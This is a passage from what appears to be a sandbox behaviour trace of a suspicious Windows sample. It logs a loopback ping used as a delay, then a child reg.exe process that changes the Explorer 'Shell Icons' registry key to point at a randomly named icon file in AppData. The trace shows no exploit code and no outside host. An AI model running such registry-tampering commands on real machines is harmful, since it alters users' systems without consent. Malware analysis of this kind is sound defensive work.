_Buf=0x354858*) returned 24 [0116.901] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0116.901] LocalFree (hMem=0x354858) returned 0x0 [0116.901] SetConsoleCtrlHandler (HandlerRoutine=0x2417ca, Add=1) returned 1 [0116.901] Icmp6SendEcho2 (in: IcmpHandle=0x358b40, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, SourceAddress=0xcf520, DestinationAddress=0x2455e0, RequestData=0x354830, RequestSize=0x20, RequestOptions=0xcf4d0, ReplyBuffer=0x35ebb0, ReplySize=0x1ff8, Timeout=0xfa0 | out: ReplyBuffer=0x35ebb0) returned 0x1 [0116.908] getnameinfo (in: pSockaddr=0x2455e0*(sa_family=23, sin6_port=0x0, sin6_flowinfo=0x0, sin6_addr="0000:0000:0000:0000:0000:0000:0000:0001", sin6_scope_id=0x0), SockaddrLength=0x1c, pNodeBuffer=0xcf9a4, NodeBufferSize=0x41, pServiceBuffer=0x0, ServiceBufferSize=0x0, Flags=2 | out: pNodeBuffer="::1", pServiceBuffer=0x0) returned 0 [0116.908] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2723, dwLanguageId=0x0, lpBuffer=0xcf4a8, nSize=0x0, Arguments=0xcf4a4 | out: lpBuffer=" Q5") returned 0x10 [0116.908] CharToOemBuffA (in: lpszSrc="Reply from ::1: ", lpszDst=0x355120, cchDstLength=0x10 | out: lpszDst="Reply from ::1: ") returned 1 [0116.908] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0116.908] _write (in: _FileHandle=1, _Buf=0x355120*, _MaxCharCount=0x10 | out: _Buf=0x355120*) returned 16 [0116.908] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0116.908] LocalFree (hMem=0x355120) returned 0x0 [0116.908] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2727, dwLanguageId=0x0, lpBuffer=0xcf4ac, nSize=0x0, Arguments=0xcf4a8 | out: lpBuffer="\x10<5") returned 0x9 [0116.908] CharToOemBuffA (in: lpszSrc="time<1ms ", lpszDst=0x353c10, cchDstLength=0x9 | out: lpszDst="time<1ms ") returned 1 [0116.908] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0116.909] _write (in: _FileHandle=1, _Buf=0x353c10*, _MaxCharCount=0x9 | out: _Buf=0x353c10*) returned 9 [0116.909] _setmode (_FileHandle=1, 
_Mode=16384) returned 32768 [0116.909] LocalFree (hMem=0x353c10) returned 0x0 [0116.909] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x273f, dwLanguageId=0x0, lpBuffer=0xcf4ac, nSize=0x0, Arguments=0xcf4a8 | out: lpBuffer=" \x8f5") returned 0x2 [0116.909] CharToOemBuffA (in: lpszSrc="\r\n", lpszDst=0x358f20, cchDstLength=0x2 | out: lpszDst="\r\n") returned 1 [0116.909] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0116.909] _write (in: _FileHandle=1, _Buf=0x358f20*, _MaxCharCount=0x2 | out: _Buf=0x358f20*) returned 2 [0116.909] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0116.909] LocalFree (hMem=0x358f20) returned 0x0 [0116.909] Sleep (dwMilliseconds=0x3e8) [0118.178] Icmp6SendEcho2 (in: IcmpHandle=0x358b40, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, SourceAddress=0xcf520, DestinationAddress=0x2455e0, RequestData=0x354830, RequestSize=0x20, RequestOptions=0xcf4d0, ReplyBuffer=0x35ebb0, ReplySize=0x1ff8, Timeout=0xfa0 | out: ReplyBuffer=0x35ebb0) returned 0x1 [0118.589] getnameinfo (in: pSockaddr=0x2455e0*(sa_family=23, sin6_port=0x0, sin6_flowinfo=0x0, sin6_addr="0000:0000:0000:0000:0000:0000:0000:0001", sin6_scope_id=0x0), SockaddrLength=0x1c, pNodeBuffer=0xcf9a4, NodeBufferSize=0x41, pServiceBuffer=0x0, ServiceBufferSize=0x0, Flags=2 | out: pNodeBuffer="::1", pServiceBuffer=0x0) returned 0 [0118.589] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2723, dwLanguageId=0x0, lpBuffer=0xcf4a8, nSize=0x0, Arguments=0xcf4a4 | out: lpBuffer=" Q5") returned 0x10 [0118.589] CharToOemBuffA (in: lpszSrc="Reply from ::1: ", lpszDst=0x355120, cchDstLength=0x10 | out: lpszDst="Reply from ::1: ") returned 1 [0118.589] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0118.589] _write (in: _FileHandle=1, _Buf=0x355120*, _MaxCharCount=0x10 | out: _Buf=0x355120*) returned 16 [0118.589] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0118.589] LocalFree (hMem=0x355120) returned 0x0 [0118.589] FormatMessageA (in: 
dwFlags=0x900, lpSource=0x0, dwMessageId=0x2727, dwLanguageId=0x0, lpBuffer=0xcf4ac, nSize=0x0, Arguments=0xcf4a8 | out: lpBuffer="\x10<5") returned 0x9 [0118.590] CharToOemBuffA (in: lpszSrc="time<1ms ", lpszDst=0x353c10, cchDstLength=0x9 | out: lpszDst="time<1ms ") returned 1 [0118.590] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0118.590] _write (in: _FileHandle=1, _Buf=0x353c10*, _MaxCharCount=0x9 | out: _Buf=0x353c10*) returned 9 [0118.590] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0118.590] LocalFree (hMem=0x353c10) returned 0x0 [0118.590] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x273f, dwLanguageId=0x0, lpBuffer=0xcf4ac, nSize=0x0, Arguments=0xcf4a8 | out: lpBuffer=" \x8f5") returned 0x2 [0118.590] CharToOemBuffA (in: lpszSrc="\r\n", lpszDst=0x358f20, cchDstLength=0x2 | out: lpszDst="\r\n") returned 1 [0118.590] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0118.590] _write (in: _FileHandle=1, _Buf=0x358f20*, _MaxCharCount=0x2 | out: _Buf=0x358f20*) returned 2 [0118.590] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0118.590] LocalFree (hMem=0x358f20) returned 0x0 [0118.590] Sleep (dwMilliseconds=0x3e8) [0119.786] Icmp6SendEcho2 (in: IcmpHandle=0x358b40, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, SourceAddress=0xcf520, DestinationAddress=0x2455e0, RequestData=0x354830, RequestSize=0x20, RequestOptions=0xcf4d0, ReplyBuffer=0x35ebb0, ReplySize=0x1ff8, Timeout=0xfa0 | out: ReplyBuffer=0x35ebb0) returned 0x1 [0119.851] getnameinfo (in: pSockaddr=0x2455e0*(sa_family=23, sin6_port=0x0, sin6_flowinfo=0x0, sin6_addr="0000:0000:0000:0000:0000:0000:0000:0001", sin6_scope_id=0x0), SockaddrLength=0x1c, pNodeBuffer=0xcf9a4, NodeBufferSize=0x41, pServiceBuffer=0x0, ServiceBufferSize=0x0, Flags=2 | out: pNodeBuffer="::1", pServiceBuffer=0x0) returned 0 [0119.851] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2723, dwLanguageId=0x0, lpBuffer=0xcf4a8, nSize=0x0, Arguments=0xcf4a4 | out: lpBuffer=" 
Q5") returned 0x10 [0119.851] CharToOemBuffA (in: lpszSrc="Reply from ::1: ", lpszDst=0x355120, cchDstLength=0x10 | out: lpszDst="Reply from ::1: ") returned 1 [0119.851] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0119.851] _write (in: _FileHandle=1, _Buf=0x355120*, _MaxCharCount=0x10 | out: _Buf=0x355120*) returned 16 [0119.851] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0119.851] LocalFree (hMem=0x355120) returned 0x0 [0119.851] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2727, dwLanguageId=0x0, lpBuffer=0xcf4ac, nSize=0x0, Arguments=0xcf4a8 | out: lpBuffer="\x10<5") returned 0x9 [0119.851] CharToOemBuffA (in: lpszSrc="time<1ms ", lpszDst=0x353c10, cchDstLength=0x9 | out: lpszDst="time<1ms ") returned 1 [0119.851] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0119.851] _write (in: _FileHandle=1, _Buf=0x353c10*, _MaxCharCount=0x9 | out: _Buf=0x353c10*) returned 9 [0119.851] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0119.851] LocalFree (hMem=0x353c10) returned 0x0 [0119.851] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x273f, dwLanguageId=0x0, lpBuffer=0xcf4ac, nSize=0x0, Arguments=0xcf4a8 | out: lpBuffer=" \x8f5") returned 0x2 [0119.852] CharToOemBuffA (in: lpszSrc="\r\n", lpszDst=0x358f20, cchDstLength=0x2 | out: lpszDst="\r\n") returned 1 [0119.852] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0119.852] _write (in: _FileHandle=1, _Buf=0x358f20*, _MaxCharCount=0x2 | out: _Buf=0x358f20*) returned 2 [0119.852] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0119.852] LocalFree (hMem=0x358f20) returned 0x0 [0119.852] getnameinfo (in: pSockaddr=0x2455e0*(sa_family=23, sin6_port=0x0, sin6_flowinfo=0x0, sin6_addr="0000:0000:0000:0000:0000:0000:0000:0001", sin6_scope_id=0x0), SockaddrLength=0x1c, pNodeBuffer=0xcf470, NodeBufferSize=0x41, pServiceBuffer=0x0, ServiceBufferSize=0x0, Flags=2 | out: pNodeBuffer="::1", pServiceBuffer=0x0) returned 0 [0119.852] FormatMessageA (in: 
dwFlags=0x900, lpSource=0x0, dwMessageId=0x274f, dwLanguageId=0x0, lpBuffer=0xcf440, nSize=0x0, Arguments=0xcf43c | out: lpBuffer="\xd0\x14\x36") returned 0x56 [0119.852] CharToOemBuffA (in: lpszSrc="\r\nPing statistics for ::1:\r\n Packets: Sent = 3, Received = 3, Lost = 0 (0% loss),\r\n", lpszDst=0x3614d0, cchDstLength=0x56 | out: lpszDst="\r\nPing statistics for ::1:\r\n Packets: Sent = 3, Received = 3, Lost = 0 (0% loss),\r\n") returned 1 [0119.852] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0119.852] _write (in: _FileHandle=1, _Buf=0x3614d0*, _MaxCharCount=0x56 | out: _Buf=0x3614d0*) returned 86 [0119.852] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0119.852] LocalFree (hMem=0x3614d0) returned 0x0 [0119.853] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2753, dwLanguageId=0x0, lpBuffer=0xcf450, nSize=0x0, Arguments=0xcf44c | out: lpBuffer="\xe8\x14\x36") returned 0x61 [0119.853] CharToOemBuffA (in: lpszSrc="Approximate round trip times in milli-seconds:\r\n Minimum = 0ms, Maximum = 0ms, Average = 0ms\r\n", lpszDst=0x3614e8, cchDstLength=0x61 | out: lpszDst="Approximate round trip times in milli-seconds:\r\n Minimum = 0ms, Maximum = 0ms, Average = 0ms\r\n") returned 1 [0119.853] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0119.853] _write (in: _FileHandle=1, _Buf=0x3614e8*, _MaxCharCount=0x61 | out: _Buf=0x3614e8*) returned 97 [0119.853] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0119.853] LocalFree (hMem=0x3614e8) returned 0x0 [0119.853] IcmpCloseHandle (IcmpHandle=0x358b40) returned 1 [0119.933] LocalFree (hMem=0x354830) returned 0x0 [0119.933] LocalFree (hMem=0x35ebb0) returned 0x0 [0119.933] WSACleanup () returned 0 [0119.973] exit (_Code=0) Thread: id = 89 os_tid = 0xe50 Thread: id = 92 os_tid = 0xe68 Thread: id = 95 os_tid = 0xe78 Process: id = "56" image_name = "reg.exe" filename = "c:\\windows\\system32\\reg.exe" page_root = "0x7ea166c0" os_pid = "0xe48" os_integrity_level = "0x3000" 
os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "44" os_parent_pid = "0xd8c" cmd_line = "reg add \"HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Icons\" /v \"29\" /t REG_SZ /f /d \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\MICROS~1\\Windows\\7l6OWDI9Fmrsoy1O.ico,0\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 8288 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 8289 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 8290 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 8291 start_va = 0xd0000 end_va = 0x10ffff entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Region: id = 8292 start_va = 0xf70000 end_va = 0xfc1fff entry_point = 0xf70000 region_type = mapped_file name = "reg.exe" filename = "\\Windows\\System32\\reg.exe" (normalized: "c:\\windows\\system32\\reg.exe") Region: id = 8293 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 8294 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: 
"c:\\windows\\system32\\apisetschema.dll") Region: id = 8295 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 8296 start_va = 0x7ffd6000 end_va = 0x7ffd6fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd6000" filename = "" Region: id = 8297 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 8298 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 8299 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 8300 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 8301 start_va = 0x130000 end_va = 0x13ffff entry_point = 0x0 region_type = private name = "private_0x0000000000130000" filename = "" Region: id = 8302 start_va = 0x2e0000 end_va = 0x3dffff entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 8303 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 8304 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 8305 start_va = 0x75810000 end_va = 0x75815fff entry_point = 0x75810000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") 
Region: id = 8306 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 8307 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 8308 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 8309 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 8310 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 8311 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 8312 start_va = 0x76e10000 end_va = 0x76e66fff entry_point = 0x76e10000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 8313 start_va = 0x77380000 end_va = 0x773b4fff entry_point = 0x77380000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 8314 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" 
(normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 8315 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 8316 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 8317 start_va = 0x140000 end_va = 0x207fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000140000" filename = "" Region: id = 8318 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 8319 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 8320 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 8321 start_va = 0x110000 end_va = 0x111fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000110000" filename = "" Region: id = 8322 start_va = 0x120000 end_va = 0x128fff entry_point = 0x120000 region_type = mapped_file name = "reg.exe.mui" filename = "\\Windows\\System32\\en-US\\reg.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\reg.exe.mui") Region: id = 8323 start_va = 0x210000 end_va = 0x210fff entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 8324 start_va = 0x220000 end_va = 0x220fff entry_point = 0x0 region_type = private name = "private_0x0000000000220000" filename = "" Region: id = 8325 start_va = 0x3e0000 end_va = 0x4e0fff entry_point = 0x0 region_type = pagefile_backed name = 
"pagefile_0x00000000003e0000" filename = "" Region: id = 8326 start_va = 0xfd0000 end_va = 0x1bcffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000fd0000" filename = "" Region: id = 8327 start_va = 0x4f0000 end_va = 0x7befff entry_point = 0x4f0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 8413 start_va = 0x7c0000 end_va = 0x87ffff entry_point = 0x7c0000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Thread: id = 88 os_tid = 0xe4c [0116.535] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x10fa6c | out: lpSystemTimeAsFileTime=0x10fa6c*(dwLowDateTime=0x82c4a8a0, dwHighDateTime=0x1d440a9)) [0116.535] GetCurrentProcessId () returned 0xe48 [0116.535] GetCurrentThreadId () returned 0xe4c [0116.535] GetTickCount () returned 0x27a3d [0116.535] QueryPerformanceCounter (in: lpPerformanceCount=0x10fa64 | out: lpPerformanceCount=0x10fa64*=17332471377) returned 1 [0116.536] GetModuleHandleA (lpModuleName=0x0) returned 0xf70000 [0116.536] __set_app_type (_Type=0x1) [0116.536] __p__fmode () returned 0x76b331f4 [0116.536] __p__commode () returned 0x76b331fc [0116.536] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xf7d4f9) returned 0x0 [0116.536] __wgetmainargs (in: _Argc=0xf7f030, _Argv=0xf7f038, _Env=0xf7f034, _DoWildCard=0, _StartInfo=0xf7f010 | out: _Argc=0xf7f030, _Argv=0xf7f038, _Env=0xf7f034) returned 0 [0116.537] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="add", cchCount1=-1, lpString2="QUERY", cchCount2=-1) returned 1 [0116.538] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="add", cchCount1=-1, lpString2="ADD", cchCount2=-1) returned 2 [0116.538] RegOpenKeyW (in: hKey=0x80000001, 
lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System", phkResult=0x10f9ec | out: phkResult=0x10f9ec*=0x0) returned 0x2 [0116.538] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="add", cchCount1=-1, lpString2="ADD", cchCount2=-1) returned 2 [0116.538] lstrlenW (lpString="-?|/?|-h|/h") returned 11 [0116.538] lstrlenW (lpString="") returned 0 [0116.538] SetThreadUILanguage (LangId=0x0) returned 0x409 [0116.553] _memicmp (_Buf1=0x2ee300, _Buf2=0xf71318, _Size=0x7) returned 0 [0116.553] lstrlenW (lpString="HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Icons") returned 67 [0116.553] _memicmp (_Buf1=0x2ee318, _Buf2=0xf71318, _Size=0x7) returned 0 [0116.554] _vsnwprintf (in: _Buffer=0x2f1060, _BufferCount=0xe, _Format="|%s|", _ArgList=0x10f908 | out: _Buffer="|-?|/?|-h|/h|") returned 13 [0116.554] _vsnwprintf (in: _Buffer=0x2f21a0, _BufferCount=0x46, _Format="|%s|", _ArgList=0x10f908 | out: _Buffer="|HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Icons|") returned 69 [0116.554] lstrlenW (lpString="|-?|/?|-h|/h|") returned 13 [0116.554] lstrlenW (lpString="|HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Icons|") returned 69 [0116.554] SetLastError (dwErrCode=0x490) [0116.554] lstrlenW (lpString="HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Icons") returned 67 [0116.554] lstrlenW (lpString="HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Icons") returned 67 [0116.554] StrChrW (lpStart=" \x09", wMatch=0x48) returned 0x0 [0116.554] StrChrW (lpStart=" \x09", wMatch=0x48) returned 0x0 [0116.554] StrChrW (lpStart=" \x09", wMatch=0x4b) returned 0x0 [0116.554] StrChrW (lpStart=" \x09", wMatch=0x4c) returned 0x0 [0116.554] StrChrW (lpStart=" \x09", wMatch=0x4d) returned 0x0 [0116.554] StrChrW (lpStart=" \x09", wMatch=0x5c) returned 0x0 [0116.554] StrChrW (lpStart=" \x09", wMatch=0x53) returned 0x0 [0116.554] StrChrW (lpStart=" \x09", wMatch=0x6f) 
returned 0x0 [0116.554] StrChrW (lpStart=" \x09", wMatch=0x66) returned 0x0 [0116.554] StrChrW (lpStart=" \x09", wMatch=0x74) returned 0x0 [0116.554] StrChrW (lpStart=" \x09", wMatch=0x77) returned 0x0 [0116.554] StrChrW (lpStart=" \x09", wMatch=0x61) returned 0x0 [0116.554] StrChrW (lpStart=" \x09", wMatch=0x72) returned 0x0 [0116.554] StrChrW (lpStart=" \x09", wMatch=0x65) returned 0x0 [0116.554] StrChrW (lpStart=" \x09", wMatch=0x5c) returned 0x0 [0116.554] StrChrW (lpStart=" \x09", wMatch=0x4d) returned 0x0 [0116.554] StrChrW (lpStart=" \x09", wMatch=0x69) returned 0x0 [0116.554] StrChrW (lpStart=" \x09", wMatch=0x63) returned 0x0 [0116.554] StrChrW (lpStart=" \x09", wMatch=0x72) returned 0x0 [0116.554] StrChrW (lpStart=" \x09", wMatch=0x6f) returned 0x0 [0116.554] StrChrW (lpStart=" \x09", wMatch=0x73) returned 0x0 [0116.554] StrChrW (lpStart=" \x09", wMatch=0x6f) returned 0x0 [0116.554] StrChrW (lpStart=" \x09", wMatch=0x66) returned 0x0 [0116.554] StrChrW (lpStart=" \x09", wMatch=0x74) returned 0x0 [0116.554] StrChrW (lpStart=" \x09", wMatch=0x5c) returned 0x0 [0116.554] StrChrW (lpStart=" \x09", wMatch=0x57) returned 0x0 [0116.555] StrChrW (lpStart=" \x09", wMatch=0x69) returned 0x0 [0116.555] StrChrW (lpStart=" \x09", wMatch=0x6e) returned 0x0 [0116.555] StrChrW (lpStart=" \x09", wMatch=0x64) returned 0x0 [0116.555] StrChrW (lpStart=" \x09", wMatch=0x6f) returned 0x0 [0116.555] StrChrW (lpStart=" \x09", wMatch=0x77) returned 0x0 [0116.555] StrChrW (lpStart=" \x09", wMatch=0x73) returned 0x0 [0116.555] StrChrW (lpStart=" \x09", wMatch=0x5c) returned 0x0 [0116.555] StrChrW (lpStart=" \x09", wMatch=0x43) returned 0x0 [0116.555] StrChrW (lpStart=" \x09", wMatch=0x75) returned 0x0 [0116.555] StrChrW (lpStart=" \x09", wMatch=0x72) returned 0x0 [0116.555] StrChrW (lpStart=" \x09", wMatch=0x72) returned 0x0 [0116.555] StrChrW (lpStart=" \x09", wMatch=0x65) returned 0x0 [0116.555] StrChrW (lpStart=" \x09", wMatch=0x6e) returned 0x0 [0116.555] StrChrW (lpStart=" 
\x09", wMatch=0x74) returned 0x0 [0116.555] StrChrW (lpStart=" \x09", wMatch=0x56) returned 0x0 [0116.555] StrChrW (lpStart=" \x09", wMatch=0x65) returned 0x0 [0116.555] StrChrW (lpStart=" \x09", wMatch=0x72) returned 0x0 [0116.555] StrChrW (lpStart=" \x09", wMatch=0x73) returned 0x0 [0116.555] StrChrW (lpStart=" \x09", wMatch=0x69) returned 0x0 [0116.555] StrChrW (lpStart=" \x09", wMatch=0x6f) returned 0x0 [0116.555] StrChrW (lpStart=" \x09", wMatch=0x6e) returned 0x0 [0116.555] StrChrW (lpStart=" \x09", wMatch=0x5c) returned 0x0 [0116.555] StrChrW (lpStart=" \x09", wMatch=0x45) returned 0x0 [0116.555] StrChrW (lpStart=" \x09", wMatch=0x78) returned 0x0 [0116.555] StrChrW (lpStart=" \x09", wMatch=0x70) returned 0x0 [0116.555] StrChrW (lpStart=" \x09", wMatch=0x6c) returned 0x0 [0116.555] StrChrW (lpStart=" \x09", wMatch=0x6f) returned 0x0 [0116.555] StrChrW (lpStart=" \x09", wMatch=0x72) returned 0x0 [0116.555] StrChrW (lpStart=" \x09", wMatch=0x65) returned 0x0 [0116.555] StrChrW (lpStart=" \x09", wMatch=0x72) returned 0x0 [0116.555] StrChrW (lpStart=" \x09", wMatch=0x5c) returned 0x0 [0116.555] StrChrW (lpStart=" \x09", wMatch=0x53) returned 0x0 [0116.555] StrChrW (lpStart=" \x09", wMatch=0x68) returned 0x0 [0116.555] StrChrW (lpStart=" \x09", wMatch=0x65) returned 0x0 [0116.555] StrChrW (lpStart=" \x09", wMatch=0x6c) returned 0x0 [0116.555] StrChrW (lpStart=" \x09", wMatch=0x6c) returned 0x0 [0116.555] StrChrW (lpStart=" \x09", wMatch=0x20) returned=" \x09" [0116.555] StrChrW (lpStart=" \x09", wMatch=0x49) returned 0x0 [0116.555] StrChrW (lpStart=" \x09", wMatch=0x63) returned 0x0 [0116.556] StrChrW (lpStart=" \x09", wMatch=0x6f) returned 0x0 [0116.556] StrChrW (lpStart=" \x09", wMatch=0x6e) returned 0x0 [0116.556] StrChrW (lpStart=" \x09", wMatch=0x73) returned 0x0 [0116.556] lstrlenW (lpString="HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Icons") returned 67 [0116.556] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, 
